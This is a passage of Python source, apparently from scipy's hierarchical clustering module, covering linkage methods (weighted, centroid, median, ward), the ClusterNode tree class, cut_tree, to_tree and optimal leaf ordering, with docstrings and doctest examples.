point would belong given a distance threshold:\n\n >>> fcluster(Z, 0.9, criterion='distance')\n array([ 7, 8, 9, 1, 2, 3, 10, 11, 12, 4, 6, 5], dtype=int32)\n >>> fcluster(Z, 1.5, criterion='distance')\n array([3, 3, 3, 1, 1, 1, 4, 4, 4, 2, 2, 2], dtype=int32)\n >>> fcluster(Z, 4, criterion='distance')\n array([2, 2, 2, 1, 1, 1, 2, 2, 2, 1, 1, 1], dtype=int32)\n >>> fcluster(Z, 6, criterion='distance')\n array([1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], dtype=int32)\n\n Also, `scipy.cluster.hierarchy.dendrogram` can be used to generate a\n plot of the dendrogram.\n\n \"\"\"\n return linkage(y, method='weighted', metric='euclidean')\n\n\ndef centroid(y):\n \"\"\"\n Perform centroid/UPGMC linkage.\n\n See `linkage` for more information on the input matrix,\n return structure, and algorithm.\n\n The following are common calling conventions:\n\n 1. ``Z = centroid(y)``\n\n Performs centroid/UPGMC linkage on the condensed distance\n matrix ``y``.\n\n 2. 
``Z = centroid(X)``\n\n Performs centroid/UPGMC linkage on the observation matrix ``X``\n using Euclidean distance as the distance metric.\n\n Parameters\n ----------\n y : ndarray\n A condensed distance matrix. A condensed\n distance matrix is a flat array containing the upper\n triangular of the distance matrix. This is the form that\n ``pdist`` returns. Alternatively, a collection of\n m observation vectors in n dimensions may be passed as\n an m by n array.\n\n Returns\n -------\n Z : ndarray\n A linkage matrix containing the hierarchical clustering. See\n the `linkage` function documentation for more information\n on its structure.\n\n See Also\n --------\n linkage : for advanced creation of hierarchical clusterings.\n scipy.spatial.distance.pdist : pairwise distance metrics\n\n Examples\n --------\n >>> from scipy.cluster.hierarchy import centroid, fcluster\n >>> from scipy.spatial.distance import pdist\n\n First, we need a toy dataset to play with::\n\n x x x x\n x x\n\n x x\n x x x x\n\n >>> X = [[0, 0], [0, 1], [1, 0],\n ... [0, 4], [0, 3], [1, 4],\n ... [4, 0], [3, 0], [4, 1],\n ... [4, 4], [3, 4], [4, 3]]\n\n Then, we get a condensed distance matrix from this dataset:\n\n >>> y = pdist(X)\n\n Finally, we can perform the clustering:\n\n >>> Z = centroid(y)\n >>> Z\n array([[ 0. , 1. , 1. , 2. ],\n [ 3. , 4. , 1. , 2. ],\n [ 9. , 10. , 1. , 2. ],\n [ 6. , 7. , 1. , 2. ],\n [ 2. , 12. , 1.11803399, 3. ],\n [ 5. , 13. , 1.11803399, 3. ],\n [ 8. , 15. , 1.11803399, 3. ],\n [11. , 14. , 1.11803399, 3. ],\n [18. , 19. , 3.33333333, 6. ],\n [16. , 17. , 3.33333333, 6. ],\n [20. , 21. , 3.33333333, 12. ]])\n\n The linkage matrix ``Z`` represents a dendrogram - see\n `scipy.cluster.hierarchy.linkage` for a detailed explanation of its\n contents.\n\n We can use `scipy.cluster.hierarchy.fcluster` to see to which cluster\n each initial point would belong given a distance threshold:\n\n >>> fcluster(Z, 0.9, criterion='distance')\n array([ 7, 8, 9, 10, 11, 12, 1, 2, 3, 4, 5, 6], dtype=int32)\n >>> fcluster(Z, 1.1, criterion='distance')\n array([5, 5, 6, 7, 7, 8, 1, 1, 2, 3, 3, 4], dtype=int32)\n >>> fcluster(Z, 2, criterion='distance')\n array([3, 3, 3, 4, 4, 4, 1, 1, 1, 2, 2, 2], dtype=int32)\n >>> fcluster(Z, 4, criterion='distance')\n array([1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], dtype=int32)\n\n Also, `scipy.cluster.hierarchy.dendrogram` can be used to generate a\n plot of the dendrogram.\n\n \"\"\"\n return linkage(y, method='centroid', metric='euclidean')\n\n\ndef median(y):\n \"\"\"\n Perform median/WPGMC linkage.\n\n See `linkage` for more information on the return structure\n and algorithm.\n\n The following are common calling conventions:\n\n 1. ``Z = median(y)``\n\n Performs median/WPGMC linkage on the condensed distance matrix\n ``y``. See ``linkage`` for more information on the return\n structure and algorithm.\n\n 2. ``Z = median(X)``\n\n Performs median/WPGMC linkage on the observation matrix ``X``\n using Euclidean distance as the distance metric. See `linkage`\n for more information on the return structure and algorithm.\n\n Parameters\n ----------\n y : ndarray\n A condensed distance matrix. A condensed\n distance matrix is a flat array containing the upper\n triangular of the distance matrix. This is the form that\n ``pdist`` returns. 
Alternatively, a collection of\n m observation vectors in n dimensions may be passed as\n an m by n array.\n\n Returns\n -------\n Z : ndarray\n The hierarchical clustering encoded as a linkage matrix.\n\n See Also\n --------\n linkage : for advanced creation of hierarchical clusterings.\n scipy.spatial.distance.pdist : pairwise distance metrics\n\n Examples\n --------\n >>> from scipy.cluster.hierarchy import median, fcluster\n >>> from scipy.spatial.distance import pdist\n\n First, we need a toy dataset to play with::\n\n x x x x\n x x\n\n x x\n x x x x\n\n >>> X = [[0, 0], [0, 1], [1, 0],\n ... [0, 4], [0, 3], [1, 4],\n ... [4, 0], [3, 0], [4, 1],\n ... [4, 4], [3, 4], [4, 3]]\n\n Then, we get a condensed distance matrix from this dataset:\n\n >>> y = pdist(X)\n\n Finally, we can perform the clustering:\n\n >>> Z = median(y)\n >>> Z\n array([[ 0. , 1. , 1. , 2. ],\n [ 3. , 4. , 1. , 2. ],\n [ 9. , 10. , 1. , 2. ],\n [ 6. , 7. , 1. , 2. ],\n [ 2. , 12. , 1.11803399, 3. ],\n [ 5. , 13. , 1.11803399, 3. ],\n [ 8. , 15. , 1.11803399, 3. ],\n [11. , 14. , 1.11803399, 3. ],\n [18. , 19. , 3. , 6. ],\n [16. , 17. , 3.5 , 6. ],\n [20. , 21. , 3.25 , 12. ]])\n\n The linkage matrix ``Z`` represents a dendrogram - see\n `scipy.cluster.hierarchy.linkage` for a detailed explanation of its\n contents.\n\n We can use `scipy.cluster.hierarchy.fcluster` to see to which cluster\n each initial point would belong given a distance threshold:\n\n >>> fcluster(Z, 0.9, criterion='distance')\n array([ 7, 8, 9, 10, 11, 12, 1, 2, 3, 4, 5, 6], dtype=int32)\n >>> fcluster(Z, 1.1, criterion='distance')\n array([5, 5, 6, 7, 7, 8, 1, 1, 2, 3, 3, 4], dtype=int32)\n >>> fcluster(Z, 2, criterion='distance')\n array([3, 3, 3, 4, 4, 4, 1, 1, 1, 2, 2, 2], dtype=int32)\n >>> fcluster(Z, 4, criterion='distance')\n array([1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], dtype=int32)\n\n Also, `scipy.cluster.hierarchy.dendrogram` can be used to generate a\n plot of the dendrogram.\n\n \"\"\"\n return linkage(y, method='median', metric='euclidean')\n\n\ndef ward(y):\n \"\"\"\n Perform Ward's linkage on a condensed distance matrix.\n\n See `linkage` for more information on the return structure\n and algorithm.\n\n The following are common calling conventions:\n\n 1. ``Z = ward(y)``\n Performs Ward's linkage on the condensed distance matrix ``y``.\n\n 2. ``Z = ward(X)``\n Performs Ward's linkage on the observation matrix ``X`` using\n Euclidean distance as the distance metric.\n\n Parameters\n ----------\n y : ndarray\n A condensed distance matrix. A condensed\n distance matrix is a flat array containing the upper\n triangular of the distance matrix. This is the form that\n ``pdist`` returns. Alternatively, a collection of\n m observation vectors in n dimensions may be passed as\n an m by n array.\n\n Returns\n -------\n Z : ndarray\n The hierarchical clustering encoded as a linkage matrix. See\n `linkage` for more information on the return structure and\n algorithm.\n\n See Also\n --------\n linkage : for advanced creation of hierarchical clusterings.\n scipy.spatial.distance.pdist : pairwise distance metrics\n\n Examples\n --------\n >>> from scipy.cluster.hierarchy import ward, fcluster\n >>> from scipy.spatial.distance import pdist\n\n First, we need a toy dataset to play with::\n\n x x x x\n x x\n\n x x\n x x x x\n\n >>> X = [[0, 0], [0, 1], [1, 0],\n ... [0, 4], [0, 3], [1, 4],\n ... [4, 0], [3, 0], [4, 1],\n ... 
[4, 4], [3, 4], [4, 3]]\n\n Then, we get a condensed distance matrix from this dataset:\n\n >>> y = pdist(X)\n\n Finally, we can perform the clustering:\n\n >>> Z = ward(y)\n >>> Z\n array([[ 0. , 1. , 1. , 2. ],\n [ 3. , 4. , 1. , 2. ],\n [ 6. , 7. , 1. , 2. ],\n [ 9. , 10. , 1. , 2. ],\n [ 2. , 12. , 1.29099445, 3. ],\n [ 5. , 13. , 1.29099445, 3. ],\n [ 8. , 14. , 1.29099445, 3. ],\n [11. , 15. , 1.29099445, 3. ],\n [16. , 17. , 5.77350269, 6. ],\n [18. , 19. , 5.77350269, 6. ],\n [20. , 21. , 8.16496581, 12. ]])\n\n The linkage matrix ``Z`` represents a dendrogram - see\n `scipy.cluster.hierarchy.linkage` for a detailed explanation of its\n contents.\n\n We can use `scipy.cluster.hierarchy.fcluster` to see to which cluster\n each initial point would belong given a distance threshold:\n\n >>> fcluster(Z, 0.9, criterion='distance')\n array([ 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12], dtype=int32)\n >>> fcluster(Z, 1.1, criterion='distance')\n array([1, 1, 2, 3, 3, 4, 5, 5, 6, 7, 7, 8], dtype=int32)\n >>> fcluster(Z, 3, criterion='distance')\n array([1, 1, 1, 2, 2, 2, 3, 3, 3, 4, 4, 4], dtype=int32)\n >>> fcluster(Z, 9, criterion='distance')\n array([1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], dtype=int32)\n\n Also, `scipy.cluster.hierarchy.dendrogram` can be used to generate a\n plot of the dendrogram.\n\n \"\"\"\n return linkage(y, method='ward', metric='euclidean')\n\n\ndef linkage(y, method='single', metric='euclidean', optimal_ordering=False):\n \"\"\"\n Perform hierarchical/agglomerative clustering.\n\n The input y may be either a 1-D condensed distance matrix\n or a 2-D array of observation vectors.\n\n If y is a 1-D condensed distance matrix,\n then y must be a :math:`\\\\binom{n}{2}` sized\n vector, where n is the number of original observations paired\n in the distance matrix. The behavior of this function is very\n similar to the MATLAB linkage function.\n\n A :math:`(n-1)` by 4 matrix ``Z`` is returned. At the\n :math:`i`-th iteration, clusters with indices ``Z[i, 0]`` and\n ``Z[i, 1]`` are combined to form cluster :math:`n + i`. A\n cluster with an index less than :math:`n` corresponds to one of\n the :math:`n` original observations. The distance between\n clusters ``Z[i, 0]`` and ``Z[i, 1]`` is given by ``Z[i, 2]``. The\n fourth value ``Z[i, 3]`` represents the number of original\n observations in the newly formed cluster.\n\n The following linkage methods are used to compute the distance\n :math:`d(s, t)` between two clusters :math:`s` and\n :math:`t`. The algorithm begins with a forest of clusters that\n have yet to be used in the hierarchy being formed. When two\n clusters :math:`s` and :math:`t` from this forest are combined\n into a single cluster :math:`u`, :math:`s` and :math:`t` are\n removed from the forest, and :math:`u` is added to the\n forest. When only one cluster remains in the forest, the algorithm\n stops, and this cluster becomes the root.\n\n A distance matrix is maintained at each iteration. The ``d[i,j]``\n entry corresponds to the distance between cluster :math:`i` and\n :math:`j` in the original forest.\n\n At each iteration, the algorithm must update the distance matrix\n to reflect the distance of the newly formed cluster u with the\n remaining clusters in the forest.\n\n Suppose there are :math:`|u|` original observations\n :math:`u[0], \\\\ldots, u[|u|-1]` in cluster :math:`u` and\n :math:`|v|` original objects :math:`v[0], \\\\ldots, v[|v|-1]` in\n cluster :math:`v`. Recall, :math:`s` and :math:`t` are\n combined to form cluster :math:`u`. 
Let :math:`v` be any\n remaining cluster in the forest that is not :math:`u`.\n\n The following are methods for calculating the distance between the\n newly formed cluster :math:`u` and each :math:`v`.\n\n * method='single' assigns\n\n .. math::\n d(u,v) = \\\\min(dist(u[i],v[j]))\n\n for all points :math:`i` in cluster :math:`u` and\n :math:`j` in cluster :math:`v`. This is also known as the\n Nearest Point Algorithm.\n\n * method='complete' assigns\n\n .. math::\n d(u, v) = \\\\max(dist(u[i],v[j]))\n\n for all points :math:`i` in cluster u and :math:`j` in\n cluster :math:`v`. This is also known by the Farthest Point\n Algorithm or Voor Hees Algorithm.\n\n * method='average' assigns\n\n .. math::\n d(u,v) = \\\\sum_{ij} \\\\frac{d(u[i], v[j])}\n {(|u|*|v|)}\n\n for all points :math:`i` and :math:`j` where :math:`|u|`\n and :math:`|v|` are the cardinalities of clusters :math:`u`\n and :math:`v`, respectively. This is also called the UPGMA\n algorithm.\n\n * method='weighted' assigns\n\n .. math::\n d(u,v) = (dist(s,v) + dist(t,v))/2\n\n where cluster u was formed with cluster s and t and v\n is a remaining cluster in the forest (also called WPGMA).\n\n * method='centroid' assigns\n\n .. math::\n dist(s,t) = ||c_s-c_t||_2\n\n where :math:`c_s` and :math:`c_t` are the centroids of\n clusters :math:`s` and :math:`t`, respectively. When two\n clusters :math:`s` and :math:`t` are combined into a new\n cluster :math:`u`, the new centroid is computed over all the\n original objects in clusters :math:`s` and :math:`t`. The\n distance then becomes the Euclidean distance between the\n centroid of :math:`u` and the centroid of a remaining cluster\n :math:`v` in the forest. This is also known as the UPGMC\n algorithm.\n\n * method='median' assigns :math:`d(s,t)` like the ``centroid``\n method. When two clusters :math:`s` and :math:`t` are combined\n into a new cluster :math:`u`, the average of centroids s and t\n give the new centroid :math:`u`. This is also known as the\n WPGMC algorithm.\n\n * method='ward' uses the Ward variance minimization algorithm.\n The new entry :math:`d(u,v)` is computed as follows,\n\n .. math::\n\n d(u,v) = \\\\sqrt{\\\\frac{|v|+|s|}\n {T}d(v,s)^2\n + \\\\frac{|v|+|t|}\n {T}d(v,t)^2\n - \\\\frac{|v|}\n {T}d(s,t)^2}\n\n where :math:`u` is the newly joined cluster consisting of\n clusters :math:`s` and :math:`t`, :math:`v` is an unused\n cluster in the forest, :math:`T=|v|+|s|+|t|`, and\n :math:`|*|` is the cardinality of its argument. This is also\n known as the incremental algorithm.\n\n Warning: When the minimum distance pair in the forest is chosen, there\n may be two or more pairs with the same minimum distance. This\n implementation may choose a different minimum than the MATLAB\n version.\n\n Parameters\n ----------\n y : ndarray\n A condensed distance matrix. A condensed distance matrix\n is a flat array containing the upper triangular of the distance matrix.\n This is the form that ``pdist`` returns. Alternatively, a collection of\n :math:`m` observation vectors in :math:`n` dimensions may be passed as\n an :math:`m` by :math:`n` array. All elements of the condensed distance\n matrix must be finite, i.e., no NaNs or infs.\n method : str, optional\n The linkage algorithm to use. See the ``Linkage Methods`` section below\n for full descriptions.\n metric : str or function, optional\n The distance metric to use in the case that y is a collection of\n observation vectors; ignored otherwise. See the ``pdist``\n function for a list of valid distance metrics. 
A custom distance\n function can also be used.\n optimal_ordering : bool, optional\n If True, the linkage matrix will be reordered so that the distance\n between successive leaves is minimal. This results in a more intuitive\n tree structure when the data are visualized. defaults to False, because\n this algorithm can be slow, particularly on large datasets [2]_. See\n also the `optimal_leaf_ordering` function.\n\n .. versionadded:: 1.0.0\n\n Returns\n -------\n Z : ndarray\n The hierarchical clustering encoded as a linkage matrix.\n\n Notes\n -----\n 1. For method 'single', an optimized algorithm based on minimum spanning\n tree is implemented. It has time complexity :math:`O(n^2)`.\n For methods 'complete', 'average', 'weighted' and 'ward', an algorithm\n called nearest-neighbors chain is implemented. It also has time\n complexity :math:`O(n^2)`.\n For other methods, a naive algorithm is implemented with :math:`O(n^3)`\n time complexity.\n All algorithms use :math:`O(n^2)` memory.\n Refer to [1]_ for details about the algorithms.\n 2. Methods 'centroid', 'median', and 'ward' are correctly defined only if\n Euclidean pairwise metric is used. If `y` is passed as precomputed\n pairwise distances, then it is the user's responsibility to assure that\n these distances are in fact Euclidean, otherwise the produced result\n will be incorrect.\n\n See Also\n --------\n scipy.spatial.distance.pdist : pairwise distance metrics\n\n References\n ----------\n .. [1] Daniel Mullner, \"Modern hierarchical, agglomerative clustering\n algorithms\", :arXiv:`1109.2378v1`.\n .. [2] Ziv Bar-Joseph, David K. Gifford, Tommi S. Jaakkola, \"Fast optimal\n leaf ordering for hierarchical clustering\", 2001. Bioinformatics\n :doi:`10.1093/bioinformatics/17.suppl_1.S22`\n\n Examples\n --------\n >>> from scipy.cluster.hierarchy import dendrogram, linkage\n >>> from matplotlib import pyplot as plt\n >>> X = [[i] for i in [2, 8, 0, 4, 1, 9, 9, 0]]\n\n >>> Z = linkage(X, 'ward')\n >>> fig = plt.figure(figsize=(25, 10))\n >>> dn = dendrogram(Z)\n\n >>> Z = linkage(X, 'single')\n >>> fig = plt.figure(figsize=(25, 10))\n >>> dn = dendrogram(Z)\n >>> plt.show()\n \"\"\"\n xp = array_namespace(y)\n y = as_xparray(y, order='C', dtype=xp.float64, xp=xp)\n\n if method not in _LINKAGE_METHODS:\n raise ValueError(f\"Invalid method: {method}\")\n\n if method in _EUCLIDEAN_METHODS and metric != 'euclidean' and y.ndim == 2:\n msg = f\"`method={method}` requires the distance metric to be Euclidean\"\n raise ValueError(msg)\n\n if y.ndim == 1:\n distance.is_valid_y(y, throw=True, name='y')\n elif y.ndim == 2:\n if (y.shape[0] == y.shape[1] and np.allclose(np.diag(y), 0) and\n xp.all(y >= 0) and np.allclose(y, y.T)):\n warnings.warn('The symmetric non-negative hollow observation '\n 'matrix looks suspiciously like an uncondensed '\n 'distance matrix',\n ClusterWarning, stacklevel=2)\n y = distance.pdist(y, metric)\n y = xp.asarray(y)\n else:\n raise ValueError(\"`y` must be 1 or 2 dimensional.\")\n\n if not xp.all(xp.isfinite(y)):\n raise ValueError(\"The condensed distance matrix must contain only \"\n \"finite values.\")\n\n n = int(distance.num_obs_y(y))\n method_code = _LINKAGE_METHODS[method]\n\n y = np.asarray(y)\n if method == 'single':\n result = _hierarchy.mst_single_linkage(y, n)\n elif method in ['complete', 'average', 'weighted', 'ward']:\n result = _hierarchy.nn_chain(y, n, method_code)\n else:\n result = _hierarchy.fast_linkage(y, n, method_code)\n result = xp.asarray(result)\n\n if optimal_ordering:\n y = xp.asarray(y)\n 
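# Optimal leaf ordering reorders Z so that adjacent leaves end up close\n        # together; as noted in the docstring above, this extra pass can be slow\n        # on large datasets.\n        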
return optimal_leaf_ordering(result, y)\n    else:\n        return result\n\n\nclass ClusterNode:\n    \"\"\"\n    A tree node class for representing a cluster.\n\n    Leaf nodes correspond to original observations, while non-leaf nodes\n    correspond to non-singleton clusters.\n\n    The `to_tree` function converts a matrix returned by the linkage\n    function into an easy-to-use tree representation.\n\n    All parameter names are also attributes.\n\n    Parameters\n    ----------\n    id : int\n        The node id.\n    left : ClusterNode instance, optional\n        The left child tree node.\n    right : ClusterNode instance, optional\n        The right child tree node.\n    dist : float, optional\n        Distance for this cluster in the linkage matrix.\n    count : int, optional\n        The number of samples in this cluster.\n\n    See Also\n    --------\n    to_tree : for converting a linkage matrix ``Z`` into a tree object.\n\n    \"\"\"\n\n    def __init__(self, id, left=None, right=None, dist=0, count=1):\n        if id < 0:\n            raise ValueError('The id must be non-negative.')\n        if dist < 0:\n            raise ValueError('The distance must be non-negative.')\n        if (left is None and right is not None) or \\\n           (left is not None and right is None):\n            raise ValueError('Only full or proper binary trees are permitted.'\n                             ' This node has one child.')\n        if count < 1:\n            raise ValueError('A cluster must contain at least one original '\n                             'observation.')\n        self.id = id\n        self.left = left\n        self.right = right\n        self.dist = dist\n        if self.left is None:\n            self.count = count\n        else:\n            self.count = left.count + right.count\n\n    def __lt__(self, node):\n        if not isinstance(node, ClusterNode):\n            raise ValueError(\"Can't compare ClusterNode \"\n                             f\"to type {type(node)}\")\n        return self.dist < node.dist\n\n    def __gt__(self, node):\n        if not isinstance(node, ClusterNode):\n            raise ValueError(\"Can't compare ClusterNode \"\n                             f\"to type {type(node)}\")\n        return self.dist > node.dist\n\n    def __eq__(self, node):\n        if not isinstance(node, ClusterNode):\n            raise ValueError(\"Can't compare ClusterNode \"\n                             f\"to type {type(node)}\")\n        return self.dist == node.dist\n\n    def get_id(self):\n        \"\"\"\n        The identifier of the target node.\n\n        For ``0 <= i < n``, `i` corresponds to original observation i.\n        For ``n <= i < 2n-1``, `i` corresponds to non-singleton cluster formed\n        at iteration ``i-n``.\n\n        Returns\n        -------\n        id : int\n            The identifier of the target node.\n\n        \"\"\"\n        return self.id\n\n    def get_count(self):\n        \"\"\"\n        The number of leaf nodes (original observations) belonging to\n        the cluster node nd. If the target node is a leaf, 1 is\n        returned.\n\n        Returns\n        -------\n        get_count : int\n            The number of leaf nodes below the target node.\n\n        \"\"\"\n        return self.count\n\n    def get_left(self):\n        \"\"\"\n        Return a reference to the left child tree object.\n\n        Returns\n        -------\n        left : ClusterNode\n            The left child of the target node. If the node is a leaf,\n            None is returned.\n\n        \"\"\"\n        return self.left\n\n    def get_right(self):\n        \"\"\"\n        Return a reference to the right child tree object.\n\n        Returns\n        -------\n        right : ClusterNode\n            The right child of the target node. 
If the node is a leaf,\n None is returned.\n\n \"\"\"\n return self.right\n\n def is_leaf(self):\n \"\"\"\n Return True if the target node is a leaf.\n\n Returns\n -------\n leafness : bool\n True if the target node is a leaf node.\n\n \"\"\"\n return self.left is None\n\n def pre_order(self, func=(lambda x: x.id)):\n \"\"\"\n Perform pre-order traversal without recursive function calls.\n\n When a leaf node is first encountered, ``func`` is called with\n the leaf node as its argument, and its result is appended to\n the list.\n\n For example, the statement::\n\n ids = root.pre_order(lambda x: x.id)\n\n returns a list of the node ids corresponding to the leaf nodes\n of the tree as they appear from left to right.\n\n Parameters\n ----------\n func : function\n Applied to each leaf ClusterNode object in the pre-order traversal.\n Given the ``i``-th leaf node in the pre-order traversal ``n[i]``,\n the result of ``func(n[i])`` is stored in ``L[i]``. If not\n provided, the index of the original observation to which the node\n corresponds is used.\n\n Returns\n -------\n L : list\n The pre-order traversal.\n\n \"\"\"\n # Do a preorder traversal, caching the result. To avoid having to do\n # recursion, we'll store the previous index we've visited in a vector.\n n = self.count\n\n curNode = [None] * (2 * n)\n lvisited = set()\n rvisited = set()\n curNode[0] = self\n k = 0\n preorder = []\n while k >= 0:\n nd = curNode[k]\n ndid = nd.id\n if nd.is_leaf():\n preorder.append(func(nd))\n k = k - 1\n else:\n if ndid not in lvisited:\n curNode[k + 1] = nd.left\n lvisited.add(ndid)\n k = k + 1\n elif ndid not in rvisited:\n curNode[k + 1] = nd.right\n rvisited.add(ndid)\n k = k + 1\n # If we've visited the left and right of this non-leaf\n # node already, go up in the tree.\n else:\n k = k - 1\n\n return preorder\n\n\n_cnode_bare = ClusterNode(0)\n_cnode_type = type(ClusterNode)\n\n\ndef _order_cluster_tree(Z):\n \"\"\"\n Return clustering nodes in bottom-up order by distance.\n\n Parameters\n ----------\n Z : scipy.cluster.linkage array\n The linkage matrix.\n\n Returns\n -------\n nodes : list\n A list of ClusterNode objects.\n \"\"\"\n q = deque()\n tree = to_tree(Z)\n q.append(tree)\n nodes = []\n\n while q:\n node = q.popleft()\n if not node.is_leaf():\n bisect.insort_left(nodes, node)\n q.append(node.get_right())\n q.append(node.get_left())\n return nodes\n\n\ndef cut_tree(Z, n_clusters=None, height=None):\n \"\"\"\n Given a linkage matrix Z, return the cut tree.\n\n Parameters\n ----------\n Z : scipy.cluster.linkage array\n The linkage matrix.\n n_clusters : array_like, optional\n Number of clusters in the tree at the cut point.\n height : array_like, optional\n The height at which to cut the tree. Only possible for ultrametric\n trees.\n\n Returns\n -------\n cutree : array\n An array indicating group membership at each agglomeration step. I.e.,\n for a full cut tree, in the first column each data point is in its own\n cluster. At the next step, two nodes are merged. Finally, all\n singleton and non-singleton clusters are in one group. 
If `n_clusters`\n or `height` are given, the columns correspond to the columns of\n `n_clusters` or `height`.\n\n Examples\n --------\n >>> from scipy import cluster\n >>> import numpy as np\n >>> from numpy.random import default_rng\n >>> rng = default_rng()\n >>> X = rng.random((50, 4))\n >>> Z = cluster.hierarchy.ward(X)\n >>> cutree = cluster.hierarchy.cut_tree(Z, n_clusters=[5, 10])\n >>> cutree[:10]\n array([[0, 0],\n [1, 1],\n [2, 2],\n [3, 3],\n [3, 4],\n [2, 2],\n [0, 0],\n [1, 5],\n [3, 6],\n [4, 7]]) # random\n\n \"\"\"\n xp = array_namespace(Z)\n nobs = num_obs_linkage(Z)\n nodes = _order_cluster_tree(Z)\n\n if height is not None and n_clusters is not None:\n raise ValueError(\"At least one of either height or n_clusters \"\n \"must be None\")\n elif height is None and n_clusters is None: # return the full cut tree\n cols_idx = xp.arange(nobs)\n elif height is not None:\n height = xp.asarray(height)\n heights = xp.asarray([x.dist for x in nodes])\n cols_idx = xp.searchsorted(heights, height)\n else:\n n_clusters = xp.asarray(n_clusters)\n cols_idx = nobs - xp.searchsorted(xp.arange(nobs), n_clusters)\n\n try:\n n_cols = len(cols_idx)\n except TypeError: # scalar\n n_cols = 1\n cols_idx = xp.asarray([cols_idx])\n\n groups = xp.zeros((n_cols, nobs), dtype=xp.int64)\n last_group = xp.arange(nobs)\n if 0 in cols_idx:\n groups[0] = last_group\n\n for i, node in enumerate(nodes):\n idx = node.pre_order()\n this_group = copy(last_group, xp=xp)\n # TODO ARRAY_API complex indexing not supported\n this_group[idx] = xp.min(last_group[idx])\n this_group[this_group > xp.max(last_group[idx])] -= 1\n if i + 1 in cols_idx:\n groups[np.nonzero(i + 1 == cols_idx)[0]] = this_group\n last_group = this_group\n\n return groups.T\n\n\ndef to_tree(Z, rd=False):\n \"\"\"\n Convert a linkage matrix into an easy-to-use tree object.\n\n The reference to the root `ClusterNode` object is returned (by default).\n\n Each `ClusterNode` object has a ``left``, ``right``, ``dist``, ``id``,\n and ``count`` attribute. The left and right attributes point to\n ClusterNode objects that were combined to generate the cluster.\n If both are None then the `ClusterNode` object is a leaf node, its count\n must be 1, and its distance is meaningless but set to 0.\n\n *Note: This function is provided for the convenience of the library\n user. ClusterNodes are not used as input to any of the functions in this\n library.*\n\n Parameters\n ----------\n Z : ndarray\n The linkage matrix in proper form (see the `linkage`\n function documentation).\n rd : bool, optional\n When False (default), a reference to the root `ClusterNode` object is\n returned. Otherwise, a tuple ``(r, d)`` is returned. ``r`` is a\n reference to the root node while ``d`` is a list of `ClusterNode`\n objects - one per original entry in the linkage matrix plus entries\n for all clustering steps. If a cluster id is\n less than the number of samples ``n`` in the data that the linkage\n matrix describes, then it corresponds to a singleton cluster (leaf\n node).\n See `linkage` for more information on the assignment of cluster ids\n to clusters.\n\n Returns\n -------\n tree : ClusterNode or tuple (ClusterNode, list of ClusterNode)\n If ``rd`` is False, a `ClusterNode`.\n If ``rd`` is True, a list of length ``2*n - 1``, with ``n`` the number\n of samples. 
See the description of `rd` above for more details.\n\n See Also\n --------\n linkage, is_valid_linkage, ClusterNode\n\n Examples\n --------\n >>> import numpy as np\n >>> from scipy.cluster import hierarchy\n >>> rng = np.random.default_rng()\n >>> x = rng.random((5, 2))\n >>> Z = hierarchy.linkage(x)\n >>> hierarchy.to_tree(Z)\n <scipy.cluster.hierarchy.ClusterNode object at ...\n >>> rootnode, nodelist = hierarchy.to_tree(Z, rd=True)\n >>> rootnode\n <scipy.cluster.hierarchy.ClusterNode object at ...\n >>> len(nodelist)\n 9\n\n \"\"\"\n xp = array_namespace(Z)\n Z = as_xparray(Z, order='c', xp=xp)\n is_valid_linkage(Z, throw=True, name='Z')\n\n # Number of original objects is equal to the number of rows plus 1.\n n = Z.shape[0] + 1\n\n # Create a list full of None's to store the node objects\n d = [None] * (n * 2 - 1)\n\n # Create the nodes corresponding to the n original objects.\n for i in range(0, n):\n d[i] = ClusterNode(i)\n\n nd = None\n\n for i in range(Z.shape[0]):\n row = Z[i, :]\n\n fi = int_floor(row[0], xp)\n fj = int_floor(row[1], xp)\n if fi > i + n:\n raise ValueError(('Corrupt matrix Z. Index to derivative cluster '\n 'is used before it is formed. See row %d, '\n 'column 0') % fi)\n if fj > i + n:\n raise ValueError(('Corrupt matrix Z. Index to derivative cluster '\n 'is used before it is formed. See row %d, '\n 'column 1') % fj)\n\n nd = ClusterNode(i + n, d[fi], d[fj], row[2])\n # ^ id ^ left ^ right ^ dist\n if row[3] != nd.count:\n raise ValueError(('Corrupt matrix Z. The count Z[%d,3] is '\n 'incorrect.') % i)\n d[n + i] = nd\n\n if rd:\n return (nd, d)\n else:\n return nd\n\n\ndef optimal_leaf_ordering(Z, y, metric='euclidean'):\n \"\"\"\n Given a linkage matrix Z and distance, reorder the cut tree.\n\n Parameters\n ----------\n Z : ndarray\n The hierarchical clustering encoded as a linkage matrix. See\n `linkage` for more information on the return structure and\n algorithm.\n y : ndarray\n The condensed distance matrix from which Z was generated.\n Alternatively, a collection of m observation vectors in n\n dimensions may be passed as an m by n array.\n metric : str or function, optional\n The distance metric to use in the case that y is a collection of\n observation vectors; ignored otherwise. See the ``pdist``\n function for a list of valid distance metrics. 
A custom distance\n function can also be used.\n\n Returns\n -------\n Z_ordered : ndarray\n A copy of the linkage matrix Z, reordered to minimize the distance\n between adjacent leaves.\n\n Examples\n --------\n >>> import numpy as np\n >>> from scipy.cluster import hierarchy\n >>> rng = np.random.default_rng()\n >>> X = rng.standard_normal((10, 10))\n >>> Z = hierarchy.ward(X)\n >>> hierarchy.leaves_list(Z)\n array([0, 3, 1, 9, 2, 5, 7, 4, 6, 8], dtype=int32)\n >>> hierarchy.leaves_list(hierarchy.optimal_leaf_ordering(Z, X))\n array([3, 0, 2, 5, 7, 4, 8, 6, 9, 1], dtype=int32)\n\n \"\"\"\n xp = array_namespace(Z, y)\n Z = as_xparray(Z, order='C', xp=xp)\n is_valid_linkage(Z, throw=True, name='Z')\n\n y = as_xparray(y, order='C', dtype=xp.float64, xp=xp)\n\n if y.ndim == 1:\n distance.is_valid_y(y, throw=True, name='y')\n elif y.ndim == 2:\n if (y.shape[0] == y.shape[1] and np.allclose(np.diag(y), 0) and\n np.all(y >= 0) and np.allclose(y, y.T)):\n warnings.warn('The symmetric non-negative hollow observation '\n 'matrix looks suspiciously like an uncondensed '\n 'distance matrix',\n ClusterWarning, stacklevel=2)\n y = distance.pdist(y, metric)\n y = xp.asarray(y)\n else:\n raise ValueError("`y` must be 1 or 2 dimensional.")\n\n if not xp.all(xp.isfinite(y)):\n raise ValueError("The condensed distance matrix must contain only "\n "finite values.")\n\n Z = np.asarray(Z)\n y = 